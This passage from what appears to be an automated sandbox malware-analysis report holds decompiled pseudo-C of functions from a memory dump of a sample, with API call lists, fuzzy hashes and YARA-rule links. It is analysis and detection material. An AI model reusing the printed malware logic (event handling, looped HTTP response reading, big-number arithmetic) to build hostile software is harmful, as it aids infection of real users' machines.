				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E047F50FF(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E047F5745(_t101,  &_v236, _a8, _t96 - _t81);
					E047F5745(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E047F50FF(_t101, 0x47fd1b0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E047F50FF(_a16, _a4);
						E047F5088(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L047FAF2E();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L047FAF28();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E047F5F21(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E047F90C2(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E047F6044(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x47fd1b0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                                          0x047f53c9
                                                          0x047f53d5
                                                          0x047f53db
                                                          0x047f53e0
                                                          0x047f53e4
                                                          0x047f5541
                                                          0x047f5545
                                                          0x047f5545
                                                          0x047f53ea
                                                          0x047f53ee
                                                          0x047f53f2
                                                          0x047f53f5
                                                          0x047f5400
                                                          0x047f5406
                                                          0x047f540b
                                                          0x047f540e
                                                          0x047f5428
                                                          0x047f5434
                                                          0x047f543d
                                                          0x047f5447
                                                          0x047f544c
                                                          0x047f544e
                                                          0x047f5451
                                                          0x047f54ff
                                                          0x047f5505
                                                          0x047f5516
                                                          0x047f5529
                                                          0x047f5539
                                                          0x00000000
                                                          0x047f553e
                                                          0x047f545a
                                                          0x047f5461
                                                          0x047f5465
                                                          0x047f546b
                                                          0x047f546d
                                                          0x047f546f
                                                          0x047f5471
                                                          0x047f5473
                                                          0x047f547d
                                                          0x047f5482
                                                          0x047f5484
                                                          0x047f5486
                                                          0x047f5487
                                                          0x047f5488
                                                          0x047f5489
                                                          0x047f5490
                                                          0x047f5497
                                                          0x047f549a
                                                          0x047f549a
                                                          0x047f5467
                                                          0x047f5467
                                                          0x047f5467
                                                          0x047f54a2
                                                          0x047f54aa
                                                          0x047f54b3
                                                          0x047f54b8
                                                          0x047f54b8
                                                          0x047f54bd
                                                          0x00000000
                                                          0x00000000
                                                          0x047f54bf
                                                          0x047f54c2
                                                          0x047f54cc
                                                          0x00000000
                                                          0x00000000
                                                          0x047f54ce
                                                          0x047f54ce
                                                          0x047f54d8
                                                          0x047f54b8
                                                          0x047f54bd
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x047f54bd
                                                          0x047f54e2
                                                          0x047f54e5
                                                          0x047f54e8
                                                          0x047f54ef
                                                          0x047f54ef
                                                          0x047f54fc
                                                          0x00000000
                                                          0x047f54fc
                                                          0x047f53f7
                                                          0x047f53fb
                                                          0x047f53fc
                                                          0x047f53fe
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x047f53fe
                                                          0x00000000

                                                          APIs
                                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 047F5473
                                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 047F5489
                                                          • memset.NTDLL ref: 047F5529
                                                          • memset.NTDLL ref: 047F5539
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: memset$_allmul_aulldiv
                                                          • String ID:
                                                          • API String ID: 3041852380-0
                                                          • Opcode ID: 2138f34053359cfa7159a4946645b6ecf934a1ab1c9161975e22f0c4cb9d0f74
                                                          • Instruction ID: 0be07e14e35eef8c6bbb8feab11ecb59d70d07eec0a39185064e391880c472e6
                                                          • Opcode Fuzzy Hash: 2138f34053359cfa7159a4946645b6ecf934a1ab1c9161975e22f0c4cb9d0f74
                                                          • Instruction Fuzzy Hash: 83415371600219BBEB109FA8CC84BEE77A5EF44714F108529FA1AA7385DB70BD558B90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047FA81C, Relevance: 6.1, APIs: 4, Instructions: 126stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(?,00000008,74B04D40), ref: 047FA82E
                                                            • Part of subcall function 047FA71F: RtlAllocateHeap.NTDLL(00000000,00000000,047F5595), ref: 047FA72B
                                                          • ResetEvent.KERNEL32(?), ref: 047FA8A2
                                                          • GetLastError.KERNEL32 ref: 047FA8C5
                                                          • GetLastError.KERNEL32 ref: 047FA970
                                                            • Part of subcall function 047FA734: HeapFree.KERNEL32(00000000,00000000,047F5637,00000000,?,?,00000000), ref: 047FA740
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                                          • String ID:
                                                          • API String ID: 943265810-0
                                                          • Opcode ID: 37bd3f50213cc5f4ae6f7b7c55dbf02415a7e473a4bf4b47916c2fb1f92e0501
                                                          • Instruction ID: 9ef2955bce944a35e825b7575f989e0377dfe2c2fe813171151ca1f6d4e4f530
                                                          • Opcode Fuzzy Hash: 37bd3f50213cc5f4ae6f7b7c55dbf02415a7e473a4bf4b47916c2fb1f92e0501
                                                          • Instruction Fuzzy Hash: 5A419C71500604BFDB329FA1CC88EAB7BBDEB89700B118929F646D2790E775A945DB30
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047F15FF, Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 42%
                                                          			E047F15FF(void* __eax, void* __ecx) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				void* _t30;
				intOrPtr _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				void* _t54;
				long _t64;
				void* _t67;
				void* _t69;

				_t58 = __ecx;
				_t67 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t30 = _t67;
					_pop(_t68);
					_t69 = _t30;
					_t64 = 0;
					ResetEvent( *(_t69 + 0x1c));
					_push( &_v8);
					_push(4);
					_push( &_v20);
					_push( *((intOrPtr*)(_t69 + 0x18)));
					if( *0x47fd134() != 0) {
						L9:
						if(_v8 == 0) {
							 *((intOrPtr*)(_t69 + 0x30)) = 0;
						} else {
							 *0x47fd164(0, 1,  &_v12);
							if(0 != 0) {
								_t64 = 8;
							} else {
								_t38 = E047FA71F(0x1000);
								_v16 = _t38;
								if(_t38 == 0) {
									_t64 = 8;
								} else {
									_push(0);
									_push(_v8);
									_push( &_v20);
									while(1) {
										_t41 = _v12;
										_t61 =  *_t41;
										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
										ResetEvent( *(_t69 + 0x1c));
										_push( &_v8);
										_push(0x1000);
										_push(_v16);
										_push( *((intOrPtr*)(_t69 + 0x18)));
										if( *0x47fd134() != 0) {
											goto L17;
										}
										_t64 = GetLastError();
										if(_t64 == 0x3e5) {
											_t64 = E047F5646( *(_t69 + 0x1c), _t61, 0xffffffff);
											if(_t64 == 0) {
												_t64 =  *((intOrPtr*)(_t69 + 0x28));
												if(_t64 == 0) {
													goto L17;
												}
											}
										}
										L19:
										E047FA734(_v16);
										if(_t64 == 0) {
											_t64 = E047F70CC(_v12, _t69);
										}
										goto L22;
										L17:
										_t64 = 0;
										if(_v8 != 0) {
											_push(0);
											_push(_v8);
											_push(_v16);
											continue;
										}
										goto L19;
									}
								}
								L22:
								_t39 = _v12;
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
						}
					} else {
						_t64 = GetLastError();
						if(_t64 != 0x3e5) {
							L8:
							if(_t64 == 0) {
								goto L9;
							}
						} else {
							_t64 = E047F5646( *(_t69 + 0x1c), _t58, 0xffffffff);
							if(_t64 == 0) {
								_t64 =  *((intOrPtr*)(_t69 + 0x28));
								goto L8;
							}
						}
					}
					return _t64;
				} else {
					_t54 = E047F9242(__ecx, __eax);
					if(_t54 != 0) {
						return _t54;
					} else {
						goto L2;
					}
				}
			}
















                                                          0x047f15ff
                                                          0x047f1600
                                                          0x047f1606
                                                          0x047f1611
                                                          0x047f1611
                                                          0x047f1613
                                                          0x047f18e7
                                                          0x047f18ec
                                                          0x047f18ee
                                                          0x047f18f3
                                                          0x047f18f4
                                                          0x047f18f9
                                                          0x047f18fa
                                                          0x047f1905
                                                          0x047f1936
                                                          0x047f193b
                                                          0x047f19fe
                                                          0x047f1941
                                                          0x047f1948
                                                          0x047f1950
                                                          0x047f19fb
                                                          0x047f1956
                                                          0x047f195b
                                                          0x047f1960
                                                          0x047f1965
                                                          0x047f19ed
                                                          0x047f196b
                                                          0x047f196b
                                                          0x047f196d
                                                          0x047f1973
                                                          0x047f1974
                                                          0x047f1974
                                                          0x047f1977
                                                          0x047f197a
                                                          0x047f1980
                                                          0x047f1985
                                                          0x047f1986
                                                          0x047f198b
                                                          0x047f198e
                                                          0x047f1999
                                                          0x00000000
                                                          0x00000000
                                                          0x047f19a1
                                                          0x047f19a9
                                                          0x047f19b5
                                                          0x047f19b9
                                                          0x047f19bb
                                                          0x047f19c0
                                                          0x00000000
                                                          0x00000000
                                                          0x047f19c0
                                                          0x047f19b9
                                                          0x047f19d2
                                                          0x047f19d5
                                                          0x047f19dc
                                                          0x047f19e7
                                                          0x047f19e7
                                                          0x00000000
                                                          0x047f19c2
                                                          0x047f19c2
                                                          0x047f19c7
                                                          0x047f19c9
                                                          0x047f19ca
                                                          0x047f19cd
                                                          0x00000000
                                                          0x047f19cd
                                                          0x00000000
                                                          0x047f19c7
                                                          0x047f1974
                                                          0x047f19ee
                                                          0x047f19ee
                                                          0x047f19f4
                                                          0x047f19f4
                                                          0x047f1950
                                                          0x047f1907
                                                          0x047f190d
                                                          0x047f1915
                                                          0x047f192e
                                                          0x047f1930
                                                          0x00000000
                                                          0x00000000
                                                          0x047f1917
                                                          0x047f1921
                                                          0x047f1925
                                                          0x047f192b
                                                          0x00000000
                                                          0x047f192b
                                                          0x047f1925
                                                          0x047f1915
                                                          0x047f1a07
                                                          0x047f1608
                                                          0x047f1608
                                                          0x047f160f
                                                          0x047f161a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x047f160f

                                                          APIs
                                                          • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,74B481D0), ref: 047F18EE
                                                          • GetLastError.KERNEL32(?,?,?,00000000,74B481D0), ref: 047F1907
                                                          • ResetEvent.KERNEL32(?), ref: 047F1980
                                                          • GetLastError.KERNEL32 ref: 047F199B
                                                            • Part of subcall function 047F9242: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 047F9259
                                                            • Part of subcall function 047F9242: SetEvent.KERNEL32(?), ref: 047F9269
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Event$ErrorLastReset$ObjectSingleWait
                                                          • String ID:
                                                          • API String ID: 1123145548-0
                                                          • Opcode ID: 6457c2a6ec1f1da5a37556f7d5b96818af1183ca405f0ce21bc1074ae1a0302e
                                                          • Instruction ID: a5dfa931815500e0ca9a493ca173df66df8d4edc8915ddd10068d78179bb3c25
                                                          • Opcode Fuzzy Hash: 6457c2a6ec1f1da5a37556f7d5b96818af1183ca405f0ce21bc1074ae1a0302e
                                                          • Instruction Fuzzy Hash: F441CF32600644EBDB22DFA5CC48AAEB3B9EF84364F514528E752D7790EA70FD019B90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047F3AB0, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SysAllocString.OLEAUT32(80000002), ref: 047F3B0D
                                                          • SysAllocString.OLEAUT32(047F85ED), ref: 047F3B51
                                                          • SysFreeString.OLEAUT32(00000000), ref: 047F3B65
                                                          • SysFreeString.OLEAUT32(00000000), ref: 047F3B73
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: String$AllocFree
                                                          • String ID:
                                                          • API String ID: 344208780-0
                                                          • Opcode ID: f674e119d7b3afe6229d2e6610a623f5dc1c97a87c4b4edbdc6a2ad1b53b57fb
                                                          • Instruction ID: 9387626b2797ae5aa1a3366ab69750d61898fe499ca71193be063cb8c27da37a
                                                          • Opcode Fuzzy Hash: f674e119d7b3afe6229d2e6610a623f5dc1c97a87c4b4edbdc6a2ad1b53b57fb
                                                          • Instruction Fuzzy Hash: 3F310C71910209EFCB05DF99D8D48EE7BB9FF48310B10842EFA0697350D734AA81CBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047F11EE, Relevance: 6.1, APIs: 4, Instructions: 96synchronizationCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 87%
                                                          			E047F11EE(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x47fd270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x47fd2a8; // 0xaea5a8
				_t3 = _t8 + 0x47fe87e; // 0x61636f4c
				_t25 = 0;
				_t30 = E047F38A8(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x47fd2ac, 1, 0, _t30);
					E047FA734(_t30);
				}
				_t12 =  *0x47fd25c; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E047FA65C() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E047F8EA1(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x47fd10c( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E047FA273(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}














                                                          0x047f11ef
                                                          0x047f11f6
                                                          0x047f1200
                                                          0x047f1204
                                                          0x047f120a
                                                          0x047f1219
                                                          0x047f1220
                                                          0x047f1224
                                                          0x047f1236
                                                          0x047f1238
                                                          0x047f1238
                                                          0x047f123d
                                                          0x047f1244
                                                          0x047f129b
                                                          0x047f129b
                                                          0x047f12a1
                                                          0x047f12a3
                                                          0x047f12a3
                                                          0x047f12ad
                                                          0x047f12b1
                                                          0x047f12c3
                                                          0x047f12c3
                                                          0x047f12c7
                                                          0x047f12cd
                                                          0x047f12cd
                                                          0x00000000
                                                          0x047f125d
                                                          0x047f1262
                                                          0x047f126a
                                                          0x047f126e
                                                          0x047f1272
                                                          0x047f1272
                                                          0x047f127f
                                                          0x047f1283
                                                          0x047f1287
                                                          0x047f12dc
                                                          0x047f12e2
                                                          0x047f12e2
                                                          0x047f1295
                                                          0x047f1299
                                                          0x047f12d0
                                                          0x047f12d2
                                                          0x047f12d5
                                                          0x047f12d5
                                                          0x00000000
                                                          0x047f12d2
                                                          0x047f1299
                                                          0x00000000
                                                          0x047f1283

                                                          APIs
                                                            • Part of subcall function 047F38A8: lstrlen.KERNEL32(00000005,00000000,63699BC3,00000027,00000000,052E9A98,00000000,?,?,63699BC3,00000005,047FD00C,?,?,047F5D30), ref: 047F38DE
                                                            • Part of subcall function 047F38A8: lstrcpy.KERNEL32(00000000,00000000), ref: 047F3902
                                                            • Part of subcall function 047F38A8: lstrcat.KERNEL32(00000000,00000000), ref: 047F390A
                                                          • CreateEventA.KERNEL32(047FD2AC,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,047F3760,?,00000001,?), ref: 047F122F
                                                            • Part of subcall function 047FA734: HeapFree.KERNEL32(00000000,00000000,047F5637,00000000,?,?,00000000), ref: 047FA740
                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,047F3760,00000000,00000000,?,00000000,?,047F3760,?,00000001,?,?,?,?,047F52AA), ref: 047F128F
                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,047F3760,?,00000001,?), ref: 047F12BD
                                                          • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,047F3760,?,00000001,?,?,?,?,047F52AA), ref: 047F12D5
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 73268831-0
                                                          • Opcode ID: ba7eaa3d458c094f4a06406a8b63f9019f9742770f361b38ed3e53e3d477832b
                                                          • Instruction ID: cc3ca637bd09251038239938b6f8cb5360063fd1598576bcc8e5dabc3bfdaafd
                                                          • Opcode Fuzzy Hash: ba7eaa3d458c094f4a06406a8b63f9019f9742770f361b38ed3e53e3d477832b
                                                          • Instruction Fuzzy Hash: 0521D232700314DBDB315AE88E48EAF73A9FB89B20F954625FF06DB300DB65EC018694
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047F9242, Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 38%
                                                          			E047F9242(void* __ecx, void* __esi) {
				char _v8;
				long _v12;
				char _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				intOrPtr _t58;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				_t60 =  *0x47fd13c; // 0x47fabf1
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_push( &_v16);
						_push( &_v8);
						_push(_t61 + 0x2c);
						_push(0x20000013);
						_push( *((intOrPtr*)(_t61 + 0x18)));
						_v8 = 4;
						_v16 = 0;
						if( *_t60() == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
							_t58 = E047FA71F(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								_push( &_v16);
								_push( &_v8);
								_push(_t58);
								_push(0x16);
								_push( *((intOrPtr*)(_t61 + 0x18)));
								if( *_t60() == 0) {
									E047FA734(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E047F5646( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}















                                                          0x047f9242
                                                          0x047f9242
                                                          0x047f924c
                                                          0x047f9252
                                                          0x047f9255
                                                          0x047f9259
                                                          0x047f925f
                                                          0x047f9264
                                                          0x047f927d
                                                          0x047f9280
                                                          0x047f9284
                                                          0x047f9288
                                                          0x047f9289
                                                          0x047f928e
                                                          0x047f9291
                                                          0x047f9298
                                                          0x047f929f
                                                          0x047f92f2
                                                          0x047f92f8
                                                          0x047f92fe
                                                          0x047f9339
                                                          0x047f933f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x047f92fe
                                                          0x047f92a5
                                                          0x00000000
                                                          0x047f92ac
                                                          0x047f92ba
                                                          0x047f92bd
                                                          0x047f92c0
                                                          0x047f92cc
                                                          0x047f92d0
                                                          0x047f9332
                                                          0x047f92d2
                                                          0x047f92d5
                                                          0x047f92d9
                                                          0x047f92da
                                                          0x047f92db
                                                          0x047f92dd
                                                          0x047f92e4
                                                          0x047f9322
                                                          0x047f932d
                                                          0x047f92e6
                                                          0x047f92e9
                                                          0x047f92ed
                                                          0x047f92ed
                                                          0x047f92e4
                                                          0x00000000
                                                          0x047f92d0
                                                          0x047f92a5
                                                          0x047f9269
                                                          0x047f926f
                                                          0x047f9272
                                                          0x047f9277
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x047f9307
                                                          0x047f930f
                                                          0x047f9314
                                                          0x047f9317
                                                          0x00000000

                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 047F9259
                                                          • SetEvent.KERNEL32(?), ref: 047F9269
                                                          • GetLastError.KERNEL32 ref: 047F92F2
                                                            • Part of subcall function 047F5646: WaitForMultipleObjects.KERNEL32(00000002,047FA8E3,00000000,047FA8E3,?,?,?,047FA8E3,0000EA60), ref: 047F5661
                                                            • Part of subcall function 047FA734: HeapFree.KERNEL32(00000000,00000000,047F5637,00000000,?,?,00000000), ref: 047FA740
                                                          • GetLastError.KERNEL32(00000000), ref: 047F9327
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                                          • String ID:
                                                          • API String ID: 602384898-0
                                                          • Opcode ID: 3ec1666e613f186e8d251c142850d1eaa2266cffd9d5680aa2245a22ace9c341
                                                          • Instruction ID: 297af8b1edbbd443ce5ba637561e9adc96b035a03b559d9fe62b403a29a0b48c
                                                          • Opcode Fuzzy Hash: 3ec1666e613f186e8d251c142850d1eaa2266cffd9d5680aa2245a22ace9c341
                                                          • Instruction Fuzzy Hash: 4A31CBF5900309EFDB21DFA5CD84E9EB7B8EF08304F10896AE742E2351D775AA459B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047F36B1, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 40%
                                                          			E047F36B1(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E047F3BB9(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E047F4F79(_t23);
						}
					}
					return _t38;
				}
				if(E047FA2F9(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x47fd2ac, 1, 0,  *0x47fd344);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E047FA446(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E047F853F(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E047F4F14(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E047F11EE( &_v32, _t39);
					goto L13;
				}
			}












                                                          0x047f36b1
                                                          0x047f36be
                                                          0x047f36c4
                                                          0x047f36c5
                                                          0x047f36c6
                                                          0x047f36c7
                                                          0x047f36c8
                                                          0x047f36cc
                                                          0x047f36d8
                                                          0x047f36dc
                                                          0x047f3764
                                                          0x047f3764
                                                          0x047f3767
                                                          0x047f3769
                                                          0x047f3771
                                                          0x047f3771
                                                          0x047f3777
                                                          0x047f377a
                                                          0x047f377a
                                                          0x047f3777
                                                          0x047f3785
                                                          0x047f3785
                                                          0x047f36ef
                                                          0x047f36f1
                                                          0x047f36f1
                                                          0x047f3708
                                                          0x047f370c
                                                          0x047f370f
                                                          0x047f371a
                                                          0x047f3721
                                                          0x047f3721
                                                          0x047f372a
                                                          0x047f372e
                                                          0x047f373c
                                                          0x047f3730
                                                          0x047f3730
                                                          0x047f3731
                                                          0x047f3732
                                                          0x047f3733
                                                          0x047f3734
                                                          0x047f3735
                                                          0x047f3735
                                                          0x047f3741
                                                          0x047f3744
                                                          0x047f3748
                                                          0x047f374a
                                                          0x047f374a
                                                          0x047f3751
                                                          0x00000000
                                                          0x047f3753
                                                          0x047f3753
                                                          0x047f3760
                                                          0x00000000
                                                          0x047f3760

                                                          APIs
                                                          • CreateEventA.KERNEL32(047FD2AC,00000001,00000000,00000040,00000001,?,74B5F710,00000000,74B5F730,?,?,?,047F52AA,?,00000001,?), ref: 047F3702
                                                          • SetEvent.KERNEL32(00000000,?,?,?,047F52AA,?,00000001,?,00000002,?,?,047F5D5E,?), ref: 047F370F
